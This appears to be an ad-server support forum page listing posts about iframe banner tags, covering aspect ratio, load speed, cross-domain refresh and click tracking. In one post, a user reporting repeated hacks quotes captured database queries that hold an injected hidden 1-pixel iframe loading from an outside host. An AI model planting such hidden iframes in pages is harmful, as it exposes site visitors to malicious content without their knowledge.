Search the Community
Showing results for tags 'Iframe'.
-
Hi! We are using iframe tags on responsive page. What we have noticed is that when we use these iframe tags and horizontally squezed the page, the aspect ratio of the banner ad goes for a toss. The images / creative looks vertically stretched. This issue doesn't happen when we use a JS banner tag. The aspect ratio of the image is maintainted when the page is horizontally squezed. Any insights into how this issue can be solved for iframe banner ad tags? Thanks! Aditya
-
My website has been navigating HORRIFICALLY slow according to Google Analytics large in part due to the ads on my site. I was recommended to use an ad as an iframe which supposedly loads the page faster with my banners, so I have implemented the iframe tags for my zones, but they also recommended doing Asynchronous for speed purposes. I am not seeing the ability to generate Asynchronous when getting my invocation code for the site. Please help. Also any additional advice on setting my site up so that the ads do not hold back any of the loading of my site would be very much appreciated.
-
I would like to auto refresh ads in iframes, but it doesn't work, as I get this error: Error: Permission denied to access property "document" I know this error is because I use domain name www.example.com and the ads are served from ads.example.com Is there any way around this?
-
I have an external javascript code that I am trying to have go through Revive. The ad company says to just ad the code to the ad server. All I can find is a window to add html code. Is there a way to implement this so it goes through our ad server? I am on v3.0.2
-
Hi, Here is some javascript to easy have click count with swiffy ads inside an iframe. In Revive adserver : create HTML Generic Banner, replace [URL_OF_YOUR_HTML_SWIFFY_FILE] with the url of your swiffy html file. We give clickurl with magicmacro <iframe src="[URL_OF_YOUR_HTML_SWIFFY_FILE]?clickurl={clickurl}" width="100%" height="90px" frambedorder="0"></iframe> Edit your swiffy html file, go down and replace last <script> block <script> var stage = new swiffy.Stage(document.getElementById('swiffycontainer'), swiffyobject, {}); stage.start(); </script>With &
- 2 replies
-
- iframe
- clickcount
-
(and 2 more)
Tagged with:
-
Hello my banners sometimes don't loaded. I'm use a iframe to implement the banner this is my code banner: <a href='http://example.com/www/delivery/ck.php?n=a767147b&cb=<?= uniqid()?>' target='_blank'><img src='http://example.com/www/delivery/avw.php?zoneid=111&cb=<?= uniqid()?>&n=a767147b' border='0' alt='' /></a> when dont load iframe the code this is: <div style="position: absolute; left: 0px; top: 0px; visibility: hidden;" id="beacon_56212f3259"><img width="0" height="0" style="width: 0px; height: 0px;" alt="" src="
-
Hello I have this IFRAME: <iframe id='a6cabdd9' name='a6cabdd9' src='http://localhost/www/delivery/afr.php?zoneid=1&cb=INSERT_RANDOM_NUMBER_HERE&lname=Pina&lemail=ricardopina&lphonenumber=933213231' frameborder='0' scrolling='no' width='297' height='248'><a href='http://localhost/www/delivery/ck.php?n=a20577b5&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://localhost/www/delivery/avw.php?zoneid=1&cb=INSERT_RANDOM_NUMBER_HERE&n=a20577b5' border='0' alt='' /></a></iframe> And I need pass
-
HTML5 banners generated using Google Swiffy can't be put into HTML banner field in Revive, the Javascript conflicts, one has to serve them via an iframe. I want the banner to be responsive. There are a lot of variables in play: in the footer of the generated HTML5 file it has this in style tags: html, body width: 100%; height: 100% and it generates this in a div tag: id = swiffycontainer style="width: 728px; height: 90px" the iframe code i insert would normally be something like this (brackets removed so it won't render in this posting) iframe src="http://domainhere.co
-
heya folks, as our ad infrastructure has been hacked multiple times, i was just playing around with my mysql proxy on my system for testing purposes. So, while i was looking at the screen i noticed something i have seen before - strange queries. "<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\";s:9:\"htmlcache\";s:169:\"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" framebord
-
Hi, after making the invocation code there is always a line with code INSERT_RANDOM_NUMBER_HERE Do i have to write a random number here or do i left it the way it is? what is the purpose of this? Thanks Patrick